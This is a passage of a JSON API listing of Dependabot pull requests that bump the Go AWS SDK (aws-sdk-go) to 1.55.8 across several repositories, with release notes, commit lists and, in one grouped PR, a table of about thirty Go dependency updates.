(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.45.15...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.45.15\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/mojatter/s3fs/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/mojatter%2Fs3fs/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":"/pkg/build","pr_created_at":"2026-04-07T07:11:37.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4216077404","node_id":"PR_kwDOR7zCgs7QaTaM","number":24,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-07T07:11:37.000Z","updated_at":"2026-04-07T07:11:45.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/LX-CodeReview/grafana__grafana__codehawk__PR107534__20260407/pull/24","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/LX-CodeReview%2Fgrafana__grafana__codehawk__PR107534__20260407/issues/24","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/24/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-04-07T06:47:49.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4215973674","node_id":"PR_kwDOR7zCgs7QZ--6","number":13,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-07T06:47:49.000Z","updated_at":"2026-04-07T06:47:56.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/LX-CodeReview/grafana__grafana__codehawk__PR107534__20260407/pull/13","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/LX-CodeReview%2Fgrafana__grafana__codehawk__PR107534__20260407/issues/13","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/13/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-04-06T22:59:49.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4214487064","node_id":"PR_kwDOCdvj-c7QVocv","number":7880,"state":"closed","title":"dev: bump the safe group across 1 directory with 42 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-20T23:57:22.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-06T22:59:49.000Z","updated_at":"2026-04-20T23:57:24.000Z","time_to_close":1213053,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"dev: bump","group_name":"safe","update_count":42,"packages":[{"name":"github.com/KimMachineGun/automemlimit","old_version":"0.7.4","new_version":"0.7.5","repository_url":"https://github.com/KimMachineGun/automemlimit"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.29.12","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.78.2","new_version":"1.98.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/coder/websocket","old_version":"1.8.13","new_version":"1.8.14","repository_url":"https://github.com/coder/websocket"},{"name":"github.com/eclipse/paho.mqtt.golang","old_version":"1.5.0","new_version":"1.5.1","repository_url":"https://github.com/eclipse/paho.mqtt.golang"},{"name":"github.com/emersion/go-smtp","old_version":"0.22.0","new_version":"0.24.0","repository_url":"https://github.com/emersion/go-smtp"},{"name":"github.com/envoyproxy/protoc-gen-validate","old_version":"1.2.1","new_version":"1.3.3","repository_url":"https://github.com/envoyproxy/protoc-gen-validate"},{"name":"github.com/getsentry/sentry-go","old_version":"0.34.1","new_version":"0.44.1","repository_url":"https://github.com/getsentry/sentry-go"},{"name":"github.com/jackc/pgx/v5","old_version":"5.7.5","new_version":"5.9.1","repository_url":"https://github.com/jackc/pgx"},{"name":"github.com/jarcoal/httpmock","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/jarcoal/httpmock"},{"name":"github.com/klauspost/compress","old_version":"1.18.0","new_version":"1.18.5","repository_url":"https://github.com/klauspost/compress"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.3","repository_url":"https://github.com/lib/pq"},{"name":"github.com/nats-io/nats-server/v2","old_version":"2.11.4","new_version":"2.12.6","repository_url":"https://github.com/nats-io/nats-server"},{"name":"github.com/prometheus/client_golang","old_version":"1.22.0","new_version":"1.23.2","repository_url":"https://github.com/prometheus/client_golang"},{"name":"github.com/redis/go-redis/v9","old_version":"9.11.0","new_version":"9.18.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/spf13/cast","old_version":"1.9.2","new_version":"1.10.0","repository_url":"https://github.com/spf13/cast"},{"name":"github.com/spf13/cobra","old_version":"1.9.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/spf13/viper","old_version":"1.20.1","new_version":"1.21.0","repository_url":"https://github.com/spf13/viper"},{"name":"github.com/throttled/throttled/v2","old_version":"2.13.0","new_version":"2.15.0","repository_url":"https://github.com/throttled/throttled"},{"name":"github.com/uptrace/bun","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/dialect/pgdialect","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/driver/pgdriver","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc","old_version":"1.37.0","new_version":"1.43.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go"},{"name":"go.thethings.network/lorawan-stack-legacy/v2","old_version":"2.1.0","new_version":"2.1.1","repository_url":"https://github.com/TheThingsNetwork/lorawan-stack"},{"name":"go.uber.org/zap","old_version":"1.27.0","new_version":"1.27.1","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"}],"path":null,"ecosystem":"go"},"body":"Bumps the safe group with 30 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/KimMachineGun/automemlimit](https://github.com/KimMachineGun/automemlimit) | `0.7.4` | `0.7.5` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.29.12` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.78.2` | `1.98.0` |\n| [github.com/coder/websocket](https://github.com/coder/websocket) | `1.8.13` | `1.8.14` |\n| [github.com/eclipse/paho.mqtt.golang](https://github.com/eclipse/paho.mqtt.golang) | `1.5.0` | `1.5.1` |\n| [github.com/emersion/go-smtp](https://github.com/emersion/go-smtp) | `0.22.0` | `0.24.0` |\n| [github.com/envoyproxy/protoc-gen-validate](https://github.com/envoyproxy/protoc-gen-validate) | `1.2.1` | `1.3.3` |\n| [github.com/getsentry/sentry-go](https://github.com/getsentry/sentry-go) | `0.34.1` | `0.44.1` |\n| [github.com/jackc/pgx/v5](https://github.com/jackc/pgx) | `5.7.5` | `5.9.1` |\n| [github.com/jarcoal/httpmock](https://github.com/jarcoal/httpmock) | `1.4.0` | `1.4.1` |\n| [github.com/klauspost/compress](https://github.com/klauspost/compress) | `1.18.0` | `1.18.5` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.3` |\n| [github.com/nats-io/nats-server/v2](https://github.com/nats-io/nats-server) | `2.11.4` | `2.12.6` |\n| [github.com/prometheus/client_golang](https://github.com/prometheus/client_golang) | `1.22.0` | `1.23.2` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.11.0` | `9.18.0` |\n| [github.com/spf13/cast](https://github.com/spf13/cast) | `1.9.2` | `1.10.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.9.1` | `1.10.2` |\n| [github.com/spf13/viper](https://github.com/spf13/viper) | `1.20.1` | `1.21.0` |\n| [github.com/throttled/throttled/v2](https://github.com/throttled/throttled) | `2.13.0` | `2.15.0` |\n| [github.com/uptrace/bun](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/dialect/pgdialect](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/driver/pgdriver](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc](https://github.com/open-telemetry/opentelemetry-go) | `1.37.0` | `1.43.0` |\n| [go.thethings.network/lorawan-stack-legacy/v2](https://github.com/TheThingsNetwork/lorawan-stack) | `2.1.0` | `2.1.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.0` | `1.27.1` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.35.0` | `0.36.0` |\n\n\nUpdates `github.com/KimMachineGun/automemlimit` from 0.7.4 to 0.7.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KimMachineGun/automemlimit/releases\"\u003egithub.com/KimMachineGun/automemlimit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003eKimMachineGun/automemlimit#31\u003c/a\u003e) by \u003ca href=\"https://github.com/KimMachineGun\"\u003e\u003ccode\u003e@​KimMachineGun\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003ehttps://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ehttps://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003e\u003ccode\u003e6d12049\u003c/code\u003e\u003c/a\u003e fix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003e#31\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.29.12 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 